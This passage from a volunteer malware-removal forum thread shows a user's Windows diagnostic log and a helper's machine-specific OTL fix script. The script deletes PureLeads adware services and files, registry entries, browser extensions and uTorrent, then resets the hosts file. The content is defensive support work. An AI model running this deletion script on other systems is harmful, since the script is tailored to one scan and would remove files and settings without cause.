"RPG Maker VX RTP_is1" = RPG Maker VX RTP
"SecondLifeViewer" = SecondLifeViewer (remove only)
"Sonic Charge Synplant VST" = Sonic Charge Synplant VST
"Steam App 105600" = Terraria
"Steam App 12210" = Grand Theft Auto IV
"Steam App 222480" = Resident Evil Revelations / Biohazard Revelations UE
"Steam App 50300" = Spec Ops: The Line
"Steam App 7670" = BioShock
"Steam App 8850" = BioShock 2
"Synthesia" = Synthesia
"Unity" = Unity
"Video Mover_is1" = Video Mover
"vReveal" = vReveal
"Wacom WebTabletPlugin for Internet Explorer and Netscape" = WebTablet FB Plugin 32 bit
"wacomid-desktop-launcher.DCFD4B89A63EE70BC162777F06D4B93B6397AEC7.1" = Bamboo Dock
"WavePad" = WavePad Sound Editor
"WinLiveSuite" = Windows Live Essentials
"ZOTAC FireStorm" = ZOTAC FireStorm
 
========== HKEY_USERS Uninstall List ==========
 
[HKEY_USERS\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"GameMaker-Studio11" = GameMaker-Studio 1.1
"UnityWebPlayer" = Unity Web Player
"uTorrent" = µTorrent
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 6/15/2014 7:48:10 AM | Computer Name = COCHRAN-PC | Source = PlsvcV2 | ID = 99
Description = In the enable methodRetrieving the COM class factory for component
 with CLSID {6EEBC7FF-67DA-4B90-9251-C2C5696E4B48} failed due to the following error:
 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
 
Error - 6/15/2014 7:53:09 AM | Computer Name = COCHRAN-PC | Source = PlsvcV2 | ID = 99
Description = In the enable methodRetrieving the COM class factory for component
 with CLSID {6EEBC7FF-67DA-4B90-9251-C2C5696E4B48} failed due to the following error:
 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
 
Error - 6/15/2014 7:58:11 AM | Computer Name = COCHRAN-PC | Source = PlsvcV2 | ID = 99
Description = In the enable methodRetrieving the COM class factory for component
 with CLSID {6EEBC7FF-67DA-4B90-9251-C2C5696E4B48} failed due to the following error:
 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
 
Error - 6/15/2014 8:03:09 AM | Computer Name = COCHRAN-PC | Source = PlsvcV2 | ID = 99
Description = In the enable methodRetrieving the COM class factory for component
 with CLSID {6EEBC7FF-67DA-4B90-9251-C2C5696E4B48} failed due to the following error:
 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
 
Error - 6/15/2014 8:08:09 AM | Computer Name = COCHRAN-PC | Source = PlsvcV2 | ID = 99
Description = In the enable methodRetrieving the COM class factory for component
 with CLSID {6EEBC7FF-67DA-4B90-9251-C2C5696E4B48} failed due to the following error:
 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
 
Error - 6/15/2014 8:13:10 AM | Computer Name = COCHRAN-PC | Source = PlsvcV2 | ID = 99
Description = In the enable methodRetrieving the COM class factory for component
 with CLSID {6EEBC7FF-67DA-4B90-9251-C2C5696E4B48} failed due to the following error:
 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
 
Error - 6/15/2014 8:18:10 AM | Computer Name = COCHRAN-PC | Source = PlsvcV2 | ID = 99
Description = In the enable methodRetrieving the COM class factory for component
 with CLSID {6EEBC7FF-67DA-4B90-9251-C2C5696E4B48} failed due to the following error:
 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
 
Error - 6/15/2014 8:23:09 AM | Computer Name = COCHRAN-PC | Source = PlsvcV2 | ID = 99
Description = In the enable methodRetrieving the COM class factory for component
 with CLSID {6EEBC7FF-67DA-4B90-9251-C2C5696E4B48} failed due to the following error:
 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
 
Error - 6/15/2014 8:28:09 AM | Computer Name = COCHRAN-PC | Source = PlsvcV2 | ID = 99
Description = In the enable methodRetrieving the COM class factory for component
 with CLSID {6EEBC7FF-67DA-4B90-9251-C2C5696E4B48} failed due to the following error:
 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
 
Error - 6/15/2014 7:02:32 PM | Computer Name = COCHRAN-PC | Source = Application Hang | ID = 1002
Description = The program Weather.exe version 6.8.0.8 stopped interacting with Windows
 and was closed. To see if more information about the problem is available, check
 the problem history in the Action Center control panel.    Process ID: 610    Start Time:
 01cf88c3442c5ce8    Termination Time: 6    Application Path: C:\Program Files (x86)\AWS\WeatherBug\Weather.exe

Report
 Id:   
 
[ System Events ]
Error - 6/13/2014 5:50:22 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7009
Description = A timeout was reached (30000 milliseconds) while waiting for the Realtek11nCU
 service to connect.
 
Error - 6/13/2014 5:50:22 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7000
Description = The Realtek11nCU service failed to start due to the following error:
   %%1053
 
Error - 6/13/2014 5:52:37 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the RtlService service.
 
Error - 6/13/2014 5:53:22 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7038
Description = The nvUpdatusService service was unable to log on as .\UpdatusUser
 with the currently configured password due to the following error:   %%1330    To ensure
 that the service is configured properly, use the Services snap-in in Microsoft
Management Console (MMC).
 
Error - 6/13/2014 5:53:22 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7000
Description = The NVIDIA Update Service Daemon service failed to start due to the
 following error:   %%1069
 
Error - 6/14/2014 6:03:59 AM | Computer Name = COCHRAN-PC | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.175.2109.0     Update Source: %%859     Update Stage:
 %%852     Source Path: Signature Type: %%800     Update Type: %%803

    User:
 NT AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10600.0

    Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 6/15/2014 4:32:10 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the Realtek11nCU service.
 
Error - 6/15/2014 4:32:40 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the RtlService service.
 
Error - 6/15/2014 4:32:54 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7038
Description = The nvUpdatusService service was unable to log on as .\UpdatusUser
 with the currently configured password due to the following error:   %%1330    To ensure
 that the service is configured properly, use the Services snap-in in Microsoft
Management Console (MMC).
 
Error - 6/15/2014 4:32:54 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7000
Description = The NVIDIA Update Service Daemon service failed to start due to the
 following error:   %%1069
 
 
< End of report >
 


  • 0

#10
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,793 posts
Hello,
You have 2 Anti Virus programs.
1-Microsoft Security Essentials.
2-AVG 2014.

The real-time protection of two antivirus programs may conflict with each other and cause the following:

* False Alarms: When the anti virus software tells you that your PC has a virus when it actually doesn't.
* Conflicts: Your system may lock up due to both products attempting to access the same file at the same time.
* Performance: More that one antivirus will cause your PC to become slow and it may even crash or blue screen.
* Less protection: Two antivirus trying to scan the same file may interfere with the process and allow a malicious file onto the computer without notice to you.

I see Microsoft security is not running, I would still uninstall it since you don't appear to be using it.

Note
Spybot - Search & Destroy\TeaTimer.exe
Please uninstall this program (Spybot), tea timer monitors the registry for changes and may prevent changes we make. You can reinstall it when we finish.


Next

We need to do a fix to delete some files using OTL
  • Double click on the OTLicon.jpg to open the program. On Vista/Win7/Win8 right click select Run As Administrator to start the program. If prompted by UAC, please allow it.
  • Under the Custom Scans/Fixes box at the bottom, paste in the following


    :COMMANDS
    [CREATERESTOREPOINT]
    
    :OTL
    SRV - [2014/01/23 18:12:52 | 000,091,936 | ---- | M] (PureLeads) [Auto | Running] -- C:\Program Files (x86)\PureLeads\PureLeadsSvc.exe -- (PlsvcV1)
    SRV - [2014/01/23 18:12:50 | 000,024,352 | ---- | M] (sendori) [Auto | Running] -- C:\Program Files (x86)\PureLeads\PureLeads.Service.exe -- (PlsvcV2)
    FF - user.js - File not found
    FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_214.dll File not found
    FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
    [2012/11/21 12:43:22 | 000,000,000 | ---D | M] (blekko search bar) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Firefox\Profiles\5afpu397.default\extensions\{636a1cf4-2af8-462e-ba54-5f0d75ad6eef}
    [2014/06/08 20:37:15 | 000,000,000 | ---D | M] ("Speedial") -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Firefox\Profiles\5afpu397.default\extensions\{fa95f577-07cb-4470-ac90-e843f5f83c52}
    [2014/06/08 20:37:23 | 000,002,771 | ---- | M] () -- C:\Users\COCHRAN\AppData\Roaming\mozilla\firefox\profiles\5afpu397.default\searchplugins\Speedial.xml
    O2:64bit: - BHO: (AVG Do Not Track) - {31332EEF-CB9F-458F-AFEB-D30E9A66B6BA} - C:\Program Files (x86)\AVG\AVG2012\avgdtiea.dll File not found
    O4 - HKLM..\Run: [PureLeads Tray] C:\Program Files (x86)\PureLeads\PureLeadsTray.exe (PureLeads)
    O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [uTorrent] C:\Users\COCHRAN\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
    O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
    O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
    O9:64bit: - Extra Button: AVG Do Not Track - {68BCFFE1-A2DA-4B40-9068-87ECBFC19D16} - C:\Program Files (x86)\AVG\AVG2012\avgdtiea.dll File not found
    O1364bit: - gopher Prefix: missing
    O13 - gopher Prefix: missing
    [1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
    
    :Files
    ipconfig /flushdns /c
    C:\Users\COCHRAN\AppData\Roaming\uTorrent\uTorrent.exe
    C:\Program Files (x86)\PureLeads\PureLeadsSvc.exe
    C:\Program Files (x86)\PureLeads\PureLeadsTray.exe
    C:\Program Files (x86)\PureLeads\PureLeads.Service.exe
    C:\Windows\SysNative\plsapp64.dll
    C:\Windows\SysWow64\plsapp.dll
    C:\ProgramData\PureLeads
    C:\Program Files (x86)\PureLeads
    C:\Users\COCHRAN\AppData\Roaming\qirbzlaje.exe
    C:\Users\COCHRAN\AppData\Roaming\saafsaf.exe
    
    :Commands
    
    [emptytemp]
    [resethosts]
    
  • Make sure all other windows are closed.
  • Click the Run Fix button at the top
  • Let the program run uninterrupted. The computer should reboot when the scan is done. If not, please reboot the computer.
  • Post the log that is found in C:\_OTL\Moved Files in your next reply.
  • Open OTL again and click the Quick Scan button.
In your next reply post.

OTL Fix log, that should pop up in front of you after the fix, if not it's located here-->C:\_OTL\Moved Files
New OTL After quick scan.

Thanks
Joe :)
  • 0

#11
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,793 posts
Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.
  • 0






Similar Topics


Also tagged with one or more of these keywords: trojan, slow, CantRemove, Windows

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP